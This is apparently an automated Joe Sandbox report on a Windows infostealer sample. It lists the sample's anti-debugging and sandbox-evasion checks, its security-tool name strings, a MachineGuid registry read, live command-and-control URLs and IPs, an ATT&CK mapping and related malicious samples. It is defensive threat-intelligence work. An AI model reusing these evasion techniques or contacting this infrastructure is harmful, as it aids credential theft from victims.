Source: C:\Users\user\Desktop\pCElIX19tu.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeCode function: 0_2_07630C3C rdtsc 0_2_07630C3C
Source: pCElIX19tu.exe, pCElIX19tu.exe, 00000000.00000002.2554591976.00000000016EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\pCElIX19tu.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\pCElIX19tu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
Source: pCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe
Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Leaks process information
Source: global trafficTCP traffic: 192.168.2.6:49710 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.6:49766 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.6:49772 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		2
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		Security Account Manager12
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets214
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
pCElIX19tu.exe51%VirustotalBrowse
pCElIX19tu.exe50%ReversingLabsWin32.Infostealer.Tinba
pCElIX19tu.exe100%AviraTR/Crypt.TPM.Gen
pCElIX19tu.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5ht.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851true
        		unknown
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlpCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://html4/loose.dtdpCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://home.fivetk5ht.top/zldPRpCElIX19tu.exe, pCElIX19tu.exe, 00000000.00000003.2470021536.0000000001C71000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGppCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpfalse
                  		unknown
                  https://httpbin.org/ipbeforepCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmlpCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851lsepCElIX19tu.exe, 00000000.00000002.2555383206.0000000001BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963pCElIX19tu.exe, 00000000.00000002.2555383206.0000000001BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpfalse
                            		unknown
                            http://upx.sf.netAmcache.hve.6.drfalse
                              		high
                              https://curl.se/docs/alt-svc.htmlpCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high
                                http://.csspCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  http://.jpgpCElIX19tu.exe, 00000000.00000003.2161664264.0000000007966000.00000004.00001000.00020000.00000000.sdmp, pCElIX19tu.exe, 00000000.00000002.2554096574.00000000013FD000.00000040.00000001.01000000.00000003.sdmpfalse
                                    		high
                                    https://httpbin.org/iperfacepCElIX19tu.exe, 00000000.00000003.2202285638.0000000001C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.121.15.192
                                      		home.fivetk5ht.topSpain
                                      		207046REDSERVICIOESfalse
                                      34.226.108.155
                                      		httpbin.orgUnited States
                                      		14618AMAZON-AESUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1578898
                                      Start date and time:2024-12-20 16:24:26 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 44s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:7
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:pCElIX19tu.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:7e467a1f5f56ccec6f54a2eadd37986e.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@2/5@10/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 104.208.16.94, 13.107.246.63, 172.202.163.200, 40.126.53.6, 4.245.163.56
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      10:25:47API Interceptor26x Sleep call for process: pCElIX19tu.exe modified
                                      10:25:59API Interceptor1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.121.15.192CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
                                      34.226.108.1555Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                              s3hvuz3XS0.exeGet hashmaliciousCryptbotBrowse
                                                65AcuGF7W7.exeGet hashmaliciousCryptbotBrowse
                                                  UYJ0oreVew.exeGet hashmaliciousUnknownBrowse
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          httpbin.orgCMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                          • 34.226.108.155
                                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 98.85.100.80
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 34.226.108.155
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 98.85.100.80
                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                          • 34.226.108.155
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                          • 98.85.100.80
                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                          • 34.226.108.155
                                                          file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                          • 34.226.108.155
                                                          home.fivetk5ht.topCMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 185.121.15.192
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 185.121.15.192

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          REDSERVICIOESCMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.121.15.192
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 185.121.15.192
                                                          http://blacksaltys.comGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.137
                                                          IGz.arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 185.189.98.142
                                                          https://agradeahead.com/Get hashmaliciousUnknownBrowse
                                                          • 185.121.15.137
                                                          http://productfocus.comGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.137
                                                          https://objmapper.com/CtmE0s2ZteC8BuQLNprxjCPB8gAgAcIi7niu-9oX3Q2eGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.137
                                                          AMAZON-AESUSsecuredoc_20241220T070409.htmlGet hashmaliciousUnknownBrowse
                                                          • 52.86.107.71
                                                          5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                          • 34.226.108.155
                                                          https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTAGet hashmaliciousUnknownBrowse
                                                          • 3.236.206.93
                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 54.7.169.53
                                                          arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 18.214.183.17
                                                          nsharm.elfGet hashmaliciousMiraiBrowse
                                                          • 15.177.209.179
                                                          tmp.zipGet hashmaliciousUnknownBrowse
                                                          • 52.0.145.89
                                                          https://alphaarchitect.com/2024/12/long-term-expected-returns/Get hashmaliciousUnknownBrowse
                                                          • 3.225.89.177
                                                          http://url4908.dhlecommerce.co.uk/ls/click?upn=u001.X2rfUT-2B51P1nILh8ZMtd4zxSiOlaeCaJtVhZupM-2F9LVEom-2B2QjKW7VcxuhsgKUeKnIPI_ewjtI2P4e42WCeQ3lgulQYJHXxC-2BKEQd0RqJfZdimIQiEcg5K71uNDU3wpKab4YU06GJXEZw9euxGD1hXreQRtHviPlL-2BsigHUpj3RYaHOJ-2FpfiIYtW5UZW-2FL-2BsfGEF-2Fu3A-2Bkin-2FRABSBeyYYIziUnz7H5jv9BuAlxlqnrkK7Xb-2BSSeTcIF0qb4hFEFWpSrypfKJHyCgl3tbBDsclBEPKsRVdEpjy6Dwgd1VZBghtqeTmGJ311VYG2rlnLwf52rNmVt0FUWd8IYzZVJADPK4JWoWP-2FevdRAolnQn3jiyaPa-2FoGFukWqUg1oi4mOa5JSgRM9klq2vHbg6hrhBgclPYZMSvATsKsPKxozGI6BjIj7xrP4YD2dZONVrYcGI5H8pGet hashmaliciousHTMLPhisherBrowse
                                                          • 52.21.33.16
                                                          https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291Get hashmaliciousUnknownBrowse
                                                          • 107.22.100.5

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_pCElIX19tu.exe_a7a539b673e496de478ac1428a41d8bc028ff40_079acfe2_74f2c5a9-880c-47ce-a0b2-c15aa8bee125\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9428872001390496
                                                          Encrypted:false
                                                          SSDEEP:192:+XYrfb0BU/Aju0ZrPMtwzuiFJZ24IO87:ffoBU/Aj5zuiFJY4IO87
                                                          MD5:3892E6D28B171881C98D9C87424E4B37
                                                          SHA1:9CBBCAF64CC613A496E49D4CB0867E3BC16ECC8C
                                                          SHA-256:1FF4B12EC91F7E89A5DA238214ECD9FE0EA48693936A99B16A0FACE86005BEB3
                                                          SHA-512:735978E5BA2B32877E2D7867F7D332C7EC852F5D42DEEAC90BCAD1755633E45106AAFA83D46685226BE119049283E6680837698FD205FF68C59427BD80059375
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.1.9.5.4.5.7.3.7.7.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.1.9.5.5.1.9.8.7.8.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.f.2.c.5.a.9.-.8.8.0.c.-.4.7.c.e.-.a.0.b.2.-.c.1.5.a.a.8.b.e.e.1.2.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.0.2.c.a.b.a.b.-.c.b.1.8.-.4.3.3.5.-.9.8.c.e.-.f.b.8.b.2.a.7.8.c.4.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.C.E.l.I.X.1.9.t.u...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.4.0.-.0.0.0.1.-.0.0.1.5.-.2.d.5.0.-.3.f.6.1.f.3.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.4.0.7.7.7.5.a.6.f.7.0.f.1.2.b.1.3.f.0.d.1.4.e.f.3.a.c.e.e.f.0.0.0.0.f.f.f.f.!.0.0.0.0.4.2.6.d.5.0.2.6.d.9.7.a.a.8.2.1.7.6.c.3.7.f.b.6.d.f.a.9.0.b.0.a.4.2.b.0.b.f.a.b.!.p.C.E.l.I.X.1.9.t.u...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERD8E9.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Fri Dec 20 15:25:54 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):231534
                                                          Entropy (8bit):1.4006837436641064
                                                          Encrypted:false
                                                          SSDEEP:768:/+W73EqfgijXv5ziiGL24dB9Q1mpuwVi:/+W7BNjXvNZGCITQ1mppVi
                                                          MD5:A7068D8CFA765D73EABB8D2D0F1C7603
                                                          SHA1:F0A186E5AF7118B53DD1BE7EC677162AC145DA14
                                                          SHA-256:73E504F4990424B2A9FC020FE6EFCCB87D28B0915A8358DE684A512A8C67CC8F
                                                          SHA-512:AB9510560E0A2641FB6F7F93F057017A2C02144D1476261B27CEF8189617788EB2E1723D01549855C0876728373F7C76A42ADAB91E7A6502765AC4B48676E611
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... .........eg........................D...............,!......................`.......8...........T............,...[...........!...........#..............................................................................eJ......4$......GenuineIntel............T.......@..._.eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA32.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8354
                                                          Entropy (8bit):3.698943219078037
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJU16fV6Y2DUSU9XNVgmfVbxM1pre89btt7/sfsPm:R6lXJu6N6Y5SU99VgmfVbAtt7kfp
                                                          MD5:0D63E36D3AAACAA739A2E95DF4A7159E
                                                          SHA1:6BD44D24DC6433026E576D1B52B7FC73B4931343
                                                          SHA-256:E79B26A06AF34E49F325D91DA732F2DE1136E2C2E95BC864B0A7239ECA913FF5
                                                          SHA-512:E491822420C9864CAFD3911247FACD3520F35A8CDB5997FE46CE8C4A726EB034C8FFABE6678137771D64C15030F71AB935E93E082A17A009B0612EF46A64453A
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.4.1.6.<./.P.i.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA72.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4594
                                                          Entropy (8bit):4.466655736618575
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsxJg77aI9nxzCWpW8VYvYm8M4JQ+5Fi+q83Wuq+zWyhQd:uIjfDI7n/7VXJQHpufzJhQd
                                                          MD5:B4E6B38B66603A61033DB7F1D2FD51F7
                                                          SHA1:1951DFED6269D9D42FE7DFB875A38989088734C4
                                                          SHA-256:D53F6E644C25892D6ADD84278EB44870A6CF06190FAB4BF46DA2FF7BB727569A
                                                          SHA-512:F228D53BB7833B4D111357911E01C487E5210CD187870D6178C827604E2E0533BEE7E1CC9AC16191DCD806FC7B67D506FDA5DBFE8EC80106EC77FC4294712709
                                                          Malicious:false
                                                          Reputation:low
